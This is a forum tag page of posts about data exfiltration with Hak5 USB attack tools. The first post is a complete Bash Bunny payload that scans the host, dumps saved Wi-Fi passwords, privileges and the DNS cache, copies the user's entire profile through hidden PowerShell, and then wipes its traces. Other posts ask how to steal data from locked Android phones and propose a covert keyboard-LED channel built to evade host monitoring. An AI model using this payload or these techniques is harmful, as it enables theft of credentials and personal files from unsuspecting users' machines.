Search the Community
Showing results for tags 'exfiltrate'.
Just got my first payload working properly and wanted to share. Hope someone finds it handy! REM Title: OooohThatsHandy REM Description: Extract useful info such as nmap, wifi keys, DNS Cache, User privilieges and group memberships, user folder contents and images REM OS: Designed for Win 10 REM Author: Twitter @PeteDavis91 REM Version: 0.3 REM Category: Exfiltration REM Attackmodes: HID Storage RNDIS_ETHERNET REM Credz: Hak5 Darren obviously, 0iphori3 and Cribbit REM LED CODES: REM SOLID BLUE LED: Setting Up REM FAST BLUE LED: Creating Data REM VERY FAST BLUE LED: Exporting Data Created and Discovered REM SOLID WHITE LED: Cleaning up and finalizing REM FINISH GREEN LED: Safe to remove your Bash Bunny - Enjoy the data REM This section sets up the BashBunny LED B SOLID Q DELAY 1000 DUCKY_LANG gb ATTACKMODE HID STORAGE RNDIS_ETHERNET Q DELAY 1000 GET TARGET_IP Q DELAY 500 REM This section runs commands to create logs and data for export LED B FAST Q DELAY 500 mkdir /root/hostsideloot Q DELAY 1000 nmap -sC -O -F $TARGET_IP >> /root/hostsideloot/1.txt Q DELAY 1000 RUN WIN 'cmd /minimized /c mkdir %TEMP%\LOOK && netsh wlan show profile * key=clear > %TEMP%\LOOK\2.txt & whoami /all > %TEMP%\LOOK\3.txt' Q DELAY 1000 RUN WIN 'cmd /minimized /c ipconfig /displaydns > %TEMP%\LOOK\4.txt' Q DELAY 750 REM This section exports the previously created data as well as the running user profile with images and documents LED B VERYFAST Q DELAY 50 RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:TEMP\\LOOK \$destination\\loot\\" Q DELAY 1000 RUN WIN "powershell -W Hidden -c \$destination = ((gwmi win32_volume -f '\"label=''BashBunny'''\").Name); robocopy \$env:USERPROFILE \$destination\\loot\\" Q DELAY 1000 mv /root/hostsideloot/1.txt /root/udisk/loot/ REM Cleanup and finalizing LED W SOLID RUN WIN 'cmd /c rmdir /s /q %TEMP%\LOOK' rmdir /root/hostsideloot ATTACKMODE FINISH LED G FINISH
Hi, I just ordered my Bash Bunny, and while I'm waiting for it, I'm gathering info for my project. On the github, there is a payload to loot data from a Windows host and I would like to do the same for an Android phone. The idea will be to use adb to extract the data, but if the Debug Mode is not on (mostly the case for normal users) you can't really use adb. I have a Galaxy S5 mini (Android 4.4 I think) to test my code on. The idea is to proceed like below: 1/ Being able to steal data from an -unlocked- phone with Debub mode enable (I think this part is easy :) ). 2/ Being able to steal data from an -unlocked- phone with Debub mode disabled. 3/ Being able to steal data from a -locked- phone with Debub mode disabled. Do you people have some kind of idea about how to do it? Like exploit a flaw to use adb or inject an app. I'm sure we can find something :)
tl;dr- Add logic to the RD to monitor key lock values. Use this for functions like file transfer. Because I wanted to see if I could, I wrote a VBScript to transmit a file using the Scroll lock, Caps lock, and Num lock keys. As it turns out, if you record the data with a fast enough camera you can decode the bits and reproduce the transmitted file. Unfortunately, to make it feasible for a camera to pickup the LED fluctuations and and then for a human to interpret the blinks, the transfer rate is very slow. In fact, if you have the time and ability to use a camera to record the computer, you should really just take a picture of the screen. If only there was a technical means of monitoring these LED statuses that could increase the rate at which this could operate... (Note: In the above video, you have to view at 60fps and set the playback speed to 25% to even have a chance of decoding it manually) Fast forward a couple days and I saw another demonstration of the Rubber Ducky on Hak5. As I understand it, the RD interprets a compiled script and primarily acts as an output only HID. Because of this, payloads from the RD have only two ways of currently gathering information. One is to exfiltrate the data over a network connection (bad because it may be logged by a firewall or proxy), and the other is to switch to USB storage mode (bad because systems may monitor or block USB Mass Storage Devices). However, by utilizing Caps/Num/Scroll lock, payloads could potentially communicate any type of data back to the Rubber Ducky (without tripping any host system security/monitoring). I'm suggesting that some logic be added to the RD to monitor the Key Locks and use them as a way of receiving data. In the video demonstration demonstration, I used sendkeys to flip the status on the three LEDs. Every-other-bit is sent to Num Lock and Caps Lock with Num Lock being bit one, Caps Lock being bit two, and Scroll Lock always being the timing. For efficiency's sake, every transmission of two bits is indicate by alternating Scroll Lock. This means that with SL turns on, two bits were sent and when SL turns off, 2 more bits were sent. This timing is necessary to indicate to the interpreter (be it human or RD) that the other two bits are current (even if they haven't changed in value). The script currently lacks any intelligence- it just blindly sends the contents of a file. But, if the script were to know it was talking to the RD, it could wait for acknowledgements from the RD before sending a file. Furthermore, since this technique would allow two-way communications with the RD, we could incorporate useful file transfer features like CRCs and the inclusion of the file name. As I mentioned in the beginning, using this technique to visually send information via the LEDs is too slow to really be of any value. But, this same technique may have value when the thing observing the LED value changes is a Rubber Ducky. I estimate that this technique would allow binary data to be sent to the RD at around 1.5 kB/s. Granted, this is a far cry from USB Mass Storage Device speeds and network transfer speeds, but this method doesn't require a system to be on-line and wouldn't leave any trail on the host system*. Of course, in addition to file transfers, two-way communications with the RD can open up more possibilities. For instance, the RD could run a script on the host system to see what version of the OS is running and then send the OS version back to the RD. From there, the RD could send a different script based on the version. Granted, you could just put this logic in one payload file that is executed on the host, but there may be cases where you want to keep some secret sauce on the RD and never written to a host machine. The Duck Whisper *- Okay, some key-loggers might record the key presses. But if the system has a key-logger, it would have recorded the entire RD session anyway.